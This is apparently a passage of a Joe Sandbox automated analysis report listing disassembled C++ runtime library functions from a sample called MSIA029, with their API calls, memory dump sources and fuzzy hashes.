                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EA9E
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EAA8
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F4EAE2
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EAF9
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EB19
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                                                                                                  • Instruction ID: b281adae24c4db52aee324dac37c864dabc505fedf6089f21a348ff45e603692
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ea5e648ea9b80fa012a4b034435cda382e359fb5608416654a9a6099160e6283
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C01C032D00619DBCB15EB649C41ABE7B71FF80760F240849F9056B2D2DF789E05EB91
                                                                                                                                                                                                                                                  Function 00F42A8B Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42A92
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42A9C
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42AD6
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42AED
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42B0D
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                                                                                                  • Instruction ID: 834fc202669dd32b31d659a519762b42608f331e6528535959f4e4bf5d300d4e
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 81d3e2c4038ec22f5e46ad340f6d8eea53e6cd350afef3c64ecfa704b04a3064
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FF01C031900619DFCB15FB649C41ABE7BA1AF84760F244819FE04AB2D2CF789E05EB91
                                                                                                                                                                                                                                                  Function 00F42B20 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42B27
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42B31
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F42B6B
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42B82
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42BA2
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                                                                                                  • Instruction ID: a2cdcb8d32d5493a3e35792572cd0b1e15385bb6ee44fb9f8c29c57560444de1
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 76988b67e4eed8058e6a3856c7fca6d6ca02cab3b2b1f981ba7b3bac503e3aed
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1D01C035900619DBCB15EB648C416BE7B71BF84730F250419F9046B3D2CFB89E05EB91
                                                                                                                                                                                                                                                  Function 00F4EB2C Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4EB33
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F4EB3D
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • moneypunct.LIBCPMT ref: 00F4EB77
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F4EB8E
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F4EBAE
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 419941038-0
                                                                                                                                                                                                                                                  • Opcode ID: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                                                                                                  • Instruction ID: 829ee2d2ffada055fc4b3635ea8e59731646f7b94978080332f4cba09924a5f7
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0f7ea4dd7a15a73f1f115e170cddee11103ec7e877b21c703563dd99323bea5b
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B401C031900619DFCB05FB64DC816BE7B60BF84720F250809F9156B2D2CF789E05AB91
                                                                                                                                                                                                                                                  Function 00F42D74 Relevance: 7.5, APIs: 5, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F42D7B
                                                                                                                                                                                                                                                  • std::_Lockit::_Lockit.LIBCPMT ref: 00F42D85
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::_Lockit.LIBCPMT ref: 00F38C50
                                                                                                                                                                                                                                                    • Part of subcall function 00F38C20: std::_Lockit::~_Lockit.LIBCPMT ref: 00F38C78
                                                                                                                                                                                                                                                  • numpunct.LIBCPMT ref: 00F42DBF
                                                                                                                                                                                                                                                  • std::_Facet_Register.LIBCPMT ref: 00F42DD6
                                                                                                                                                                                                                                                  • std::_Lockit::~_Lockit.LIBCPMT ref: 00F42DF6
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 743221004-0
                                                                                                                                                                                                                                                  • Opcode ID: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                                                                                                  • Instruction ID: 195e94bb535abc7bf1ba1e108e06cbb10ba6e26959df14583be27ebe6be3c4ca
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aefaed08abefdd302769745351384ee1b149a6b855a67890bb8581cab3b0e9a4
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E601C031D00219DBCB05EBA4DC416BEBBB0BF84720F650819F914AB2D2DF789E01BB91
                                                                                                                                                                                                                                                  Function 00F52C4E Relevance: 7.5, APIs: 5, Instructions: 37COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C58
                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(00F8DD3C,?,?,00F32427,00F8E638,00F76B40), ref: 00F52C8B
                                                                                                                                                                                                                                                  • RtlWakeAllConditionVariable.NTDLL ref: 00F52D02
                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D0C
                                                                                                                                                                                                                                                  • ResetEvent.KERNEL32(?,00F32427,00F8E638,00F76B40), ref: 00F52D18
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3916383385-0
                                                                                                                                                                                                                                                  • Opcode ID: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                                                                                                  • Instruction ID: c7aaa777f6d77da126810d25d0f6d3a47c55f80c20f21c35eeb58f6650cdb740
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 97d720923773ec33fda3d0c37d3799586f98b0e4defc01b07b26218c6b11d453
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27014632A14228DFC715AF18FC08AE9BB65FF49761701446AF90683371DB705841FBA1
                                                                                                                                                                                                                                                  Function 00F3BB40 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 181memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • LocalAlloc.KERNEL32(00000040,00000018,80A20388,?,00000000), ref: 00F3BBA3
                                                                                                                                                                                                                                                  • Concurrency::cancel_current_task.LIBCPMT ref: 00F3BD7F
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: AllocConcurrency::cancel_current_taskLocal
                                                                                                                                                                                                                                                  • String ID: false$true
                                                                                                                                                                                                                                                  • API String ID: 3924972193-2658103896
                                                                                                                                                                                                                                                  • Opcode ID: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                                                                                                  • Instruction ID: 8097593466c97d7ecc3d4fe3eebd3df81133666125712f20d003a04083560838
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fcc815dcfce025b0a2f8a4867284399b36f77781de8e818b97f52e26d0af3f13
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2D61B1B1D00348DBDB10DFA4C841BDEBBF4FF04714F14825AE945AB281E7B5AA48DB91
                                                                                                                                                                                                                                                  Function 00F4D3CB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D3D2
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: __EH_prolog3.LIBCMT ref: 00F42555
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::_Lockit.LIBCPMT ref: 00F4255F
                                                                                                                                                                                                                                                    • Part of subcall function 00F4254E: std::_Lockit::~_Lockit.LIBCPMT ref: 00F425D0
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F4D46E
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Find_elemH_prolog3H_prolog3_Lockit::_Lockit::~_
                                                                                                                                                                                                                                                  • String ID: %.0Lf$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 2544715827-3094241602
                                                                                                                                                                                                                                                  • Opcode ID: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                                                                                                  • Instruction ID: 5c828320d91768ed27cd11f6602ce064b801a66da33e6000a09ea7e597a69e25
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 69683604d087903467f3edd6d7ac93ae35d9a2c13da435c6fe35bdaf637c2be3
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01413A31900218DFCF15DFA8C880ADDBFB5BF08314F144159E905AB265DB74AA56EBA2
                                                                                                                                                                                                                                                  Function 00F4D66F Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F4D676
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38657
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::_Lockit.LIBCPMT ref: 00F38679
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F386A1
                                                                                                                                                                                                                                                    • Part of subcall function 00F38610: std::_Lockit::~_Lockit.LIBCPMT ref: 00F3880E
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F4D712
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                  • Opcode ID: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                                                                                                  • Instruction ID: 6783ba5bf4f3ee914da54a4b3c103e6b63371ff609f9d493818ccd77d5ba45a9
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c5026e49f917b25b20903b1861fc64163d45e7d215ddb6d02df505a3a87caf49
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 03415B71900218DFCF15EFA8CC80ADE7FB5BF08320F140159E915AB255DB34DA56EB92
                                                                                                                                                                                                                                                  Function 00F5175A Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3_GS.LIBCMT ref: 00F51761
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392A0
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::_Lockit.LIBCPMT ref: 00F392C2
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F392EA
                                                                                                                                                                                                                                                    • Part of subcall function 00F39270: std::_Lockit::~_Lockit.LIBCPMT ref: 00F39422
                                                                                                                                                                                                                                                  • _Find_elem.LIBCPMT ref: 00F517FB
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Lockitstd::_$Lockit::_Lockit::~_$Find_elemH_prolog3_
                                                                                                                                                                                                                                                  • String ID: 0123456789-$0123456789-
                                                                                                                                                                                                                                                  • API String ID: 3042121994-2494171821
                                                                                                                                                                                                                                                  • Opcode ID: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                                                                                                  • Instruction ID: cecde9125e7e3cfa0a36df8de3dc3db020ab7bbfd15ee8bb21767f96f719afc4
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 27f7c835d171a199d0f042743ebe58a30f6c6798dc8101efd9cd38ef720cfe0f
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 20416031900209EFCF15DFA8D881A9EBBB5FF04311F10415AF911AB252DB78EA56EB91
                                                                                                                                                                                                                                                  Function 00F48386 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • __EH_prolog3.LIBCMT ref: 00F4838D
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C62
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C7F
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocstr.LIBCPMT ref: 00F41C9C
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CAE
                                                                                                                                                                                                                                                    • Part of subcall function 00F41C42: _Maklocchr.LIBCPMT ref: 00F41CC1
                                                                                                                                                                                                                                                  • _Mpunct.LIBCPMT ref: 00F4841A
                                                                                                                                                                                                                                                  • _Mpunct.LIBCPMT ref: 00F48434
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_4_2_f30000_MSIA029.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Maklocstr$MaklocchrMpunct$H_prolog3
                                                                                                                                                                                                                                                  • String ID: $+xv
                                                                                                                                                                                                                                                  • API String ID: 2939335142-1686923651
                                                                                                                                                                                                                                                  • Opcode ID: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                                                                                                  • Instruction ID: f24b0a4dfc089d9566e4eca7936ad263c0d43bb3a44311fb9058e45d565ea81f
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7a2c779a3cb2b2f6b5aa8af2cd014203532827df31e86dabc1accd721eff4ee7
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C21F1B1904B926ED725DF74C88073FBEF8BB08300F04455AE899C7A42E774E602DBA0
                                                                                                                                                                                                                                                  Function 00F4FFEA Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 73COMMONLIBRARYCODE
                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000004.00000002.1365806008.0000000000F31000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365764859.0000000000F30000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365857118.0000000000F77000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365904745.0000000000F8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000004.00000002.1365932416.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
